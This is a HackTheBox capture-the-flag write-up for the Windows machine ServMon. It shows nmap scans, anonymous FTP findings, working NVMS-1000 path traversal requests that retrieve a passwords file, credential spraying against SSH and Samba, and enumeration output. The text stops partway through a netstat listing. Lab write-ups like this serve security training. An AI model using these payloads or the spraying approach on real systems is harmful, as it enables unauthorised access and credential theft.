ServMon

This is a writeup for the HackTheBox machine ServMon. ServMon retired 20/06/2020 at 19.00 UTC.

It is an easy Windows machine, and largely relies on CVE's for exploitation.

Motivation

My motivation for doing this machine was to challenge myself to do it before it got retired. I had about 8 hours or so when I started.

Summary:

  1. Anonymous FTP reveals location of password file
  2. NVMS-1000 Path Traversal allows retrieval of above discovered password file (CVE)
  3. Spraying found credentials targeted to known users gives valid SSH session (User pwn'd)
  4. Looking at previously found NSClient++ page's configuration file reveals the password
  5. Put a netcat binary or prepare a reverse shell somehow (script execution is restricted and the box runs AV)
  6. NSClient++ is vulnerable to privilege escalation by scheduling a task (Exploit)
  7. Get root shell

Detailed walkthrough

NMAP

In the words of @ippsec

"As always we start off with a NMAP"

(Sidenote: Thanks for producing amazing content, I would not be able to get this box without your guidance!)

  • NMAP "quick" scan (top 1000 ports, as is by default - ref)
... The simple command nmap <target> scans the most commonly used 1,000 TCP ports on the host <target> ...
$ sudo nmap -sC -sV -O 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 10:33 JST
Nmap scan report for 10.10.10.184
Host is up (0.15s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|     Sat:Saturday
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=6/20%Time=5EECDAED%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=6/20%Time=5EECDAF6%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\x12
SF:\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\x18\xc7\x08\x12"
SF:)%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDo
SF:cument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCo
SF:ntent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,
SF:"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20fo
SF:und")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\
SF:nDocument\x20not\x20found");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/20%OT=21%CT=1%CU=42752%PV=Y%DS=2%DC=I%G=Y%TM=5EECDB8
OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%CI=I%TS=U)SEQ(SP=104%GC
OS:D=1%ISR=10B%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NN
OS:S%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W
OS:6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF
OS:=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G
OS:)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-19T15:36:16
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.74 seconds
Quick scan
  • NMAP all ports
$ sudo nmap -p- -T5 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 10:54 JST
Warning: 10.10.10.184 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.184
Host is up (0.17s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
5666/tcp  open  nrpe
6063/tcp  open  x11
6699/tcp  open  napster
8443/tcp  open  https-alt
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 639.38 seconds
All ports scan
  • NMAP targeted scan
$ sudo nmap -sC -sV -O -p 21,22,80,135,139,445,5040,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670 -T5 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 11:42 JST
Nmap scan report for SERVMON (10.10.10.184)
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  x11?
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=6/20%Time=5EED6980%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=6/20%Time=5EED6989%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\
SF:x18\xcb\x15\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:
SF:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1
SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r
SF:(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocum
SF:ent\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Leng
SF:th:\x2018\r\n\r\nDocument\x20not\x20found");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Longhorn (95%), Microsoft Windows 10 1511 (93%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%), Microsoft Windows 8 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 7 Enterprise SP1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -7s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-20T01:45:00
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.09 seconds
Targeted scan

Anonymous FTP

FTP access - Note that password field can be anything

The easiest and quickest way to continue from the above results is the anonymous FTP enumeration. To download the files to your current local directory, simply use:

# get <filename>
$ get Confidential.txt
FTP commands

By accessing the FTP share, we get access to the following data:

  • Nadine/Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
Confidential.txt
  • Nathan/Notes to do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint   
Notes to do.txt

From the above notes, it seems quite clear that we can somehow reach the Passwords.txt file on Nathan's desktop.


NVMS-1000 Path Traversal

From the NMAP scan, we also know there are webservices running on this server. Webservices are usually vulnerable, so I decided to enumerate those next.

  • Port 80
On port 80, we have NVMS-1000

After a quick google search, we find CVE-2019-20085. This Path Traversal vulnerability is a perfect candidate for accessing the file above, but let us not get ahead of ourselves.

  • Port 8443
On 8443 we have NSClient++

After quickly checking the page for any issues, I did a search to see if I could find any issues with this software. This software also had some juicy exploits, but since they were authenticated exploits, I decided to focus on port 80 first.

Searchsploit results

After reading the exploit details, it seems like a trivial exploit. I fired up burp, intercepted a request to the base page, and added the basic payload as given in the PoC.

I am always surprised when PoCs just work!

It worked perfectly...! Afterwards, I had to play around a little until I found a payload that gave me the file with the passwords. Note: I was stuck for a few minutes due to following the PoC and including Windows in the payload (See below).  After trying and failing for a bit, I finally got it.

# Wrong path
GET /Pages/login.htm/../../../../../../../../../../Windows/Users/Nathan/Desktop/Passwords.txt HTTP/1.1
# Right path
GET /Pages/login.htm/../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Payloads
Aaand, we get all the passwords!

OK, time to move on!


Password spray SSH

After finding the credentials, I decided to spray SSH and Samba for valid logins. I used the previously known usernames for this. I considered trying the credentials on the NSClient++ service, but decided that would be my next step if SSH and Samba failed.

  • SSH
Enumerating SSH credentials
  • Samba
Enumerating samba credentials
Samba shares available

As you can see, there are hits on both. I tested quickly, and both were valid. I personally prefer SSH, so that's what I continued with, knowing I had Samba as a fallback, if needed.

After logging in through SSH, these were the user folders we had access to:

$ tree . > out.txt
Folder PATH listing
Volume serial number is 728C-D22C
C:\USERS
+---Administrator
+---Nadine
|   |   out.txt
|   |   
|   +---3D Objects
|   +---Contacts
|   +---Desktop
|   |       user.txt
|   |       
|   +---Documents
|   +---Downloads
|   +---Favorites
|   |   |   Bing.url
|   |   |   
|   |   \---Links
|   +---Links
|   |       Desktop.lnk
|   |       Downloads.lnk
|   |       
|   +---Music
|   +---OneDrive
|   +---Pictures
|   |   \---Camera Roll
|   +---Saved Games
|   +---Searches
|   |       winrt--{S-1-5-21-3877449121-2587550681-992675040-1002}-.searchconnector-ms
|   |       
|   \---Videos
+---Nathan
\---Public
Tree of User folders on the box

Wooo, we got user!

Shell access as Nadine
User done!

Privilege Escalation

At this point, it was time to think of how to get to root. I started JAWS in the background, so I had some recon going. We still hadn't dealt with NSClient++, so I wanted to dig into that while my script was running.

For the curious, here is the output of JAWS. Not much interesting!

Running J.A.W.S. Enumeration
	- Gathering User Information
	- Gathering Processes, Services and Scheduled Tasks
	- Gathering Installed Software
	- Gathering File System Information
	- Looking for Simple Priv Esc Methods
############################################################
##     J.A.W.S. (Just Another Windows Enum Script)        ##
##                                                        ##
##           https://github.com/411Hall/JAWS              ##
##                                                        ##
############################################################

Windows Version: 
Architecture: AMD64
Hostname: SERVMON
Current User: nadine
Current Time\Date: 06/20/2020 04:03:36

-----------------------------------------------------------
 Users
-----------------------------------------------------------
----------
Username: Administrator
Groups:   Administrators
----------
Username: DefaultAccount
Groups:   System Managed Accounts Group
----------
Username: Guest
Groups:   Guests
----------
Username: Nadine
Groups:   Users
----------
Username: Nathan
Groups:   Users
----------
Username: sshd
Groups:   
----------
Username: WDAGUtilityAccount
Groups:   

-----------------------------------------------------------
 Network Information
-----------------------------------------------------------

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::405e:6db1:cf1b:2fec
   Temporary IPv6 Address. . . . . . : dead:beef::8070:2c31:c321:65d0
   Link-local IPv6 Address . . . . . : fe80::405e:6db1:cf1b:2fec%3
   IPv4 Address. . . . . . . . . . . : 10.10.10.184
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:12d6%3
                                       10.10.10.2

-----------------------------------------------------------
 Arp
-----------------------------------------------------------

Interface: 10.10.10.184 --- 0x3
  Internet Address      Physical Address      Type
  10.10.10.2            00-50-56-b9-12-d6     dynamic   
  10.10.10.255          ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  234.55.55.55          01-00-5e-37-37-37     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static    


-----------------------------------------------------------
 NetStat
-----------------------------------------------------------

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       2644
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       2784
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       3100
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       872
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       4880
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       3380
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       3380
  TCP    0.0.0.0:6063           0.0.0.0:0              LISTENING       3100
  TCP    0.0.0.0:6699           0.0.0.0:0              LISTENING       3100
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       3380
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       484
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1120
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1528
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2092
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       620
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       2480
  TCP    10.10.10.184:22        10.10.14.49:39144      ESTABLISHED     2784
  TCP    10.10.10.184:22        10.10.14.49:42816      ESTABLISHED     2784
  TCP    10.10.10.184:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.184:5040      10.10.14.49:320        CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60126      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60206      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60266      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60298      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60324      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60390      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60430      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60462      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60502      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60526      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60548      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60556      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60566      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60578      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60586      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60594      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60606      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60616      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60622      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60634      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60640      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60648      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60654      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60660      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60662      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60664      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60666      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60668      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60670      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60724      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60838      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.49:60840      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:416        CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48250      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48352      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48394      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48428      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48486      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48538      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48562      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48584      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48630      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48650      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48670      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48674      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48678      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48684      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48690      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48694      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48698      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48704      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48708      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48714      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48716      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48718      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48720      CLOSE_WAIT      4880
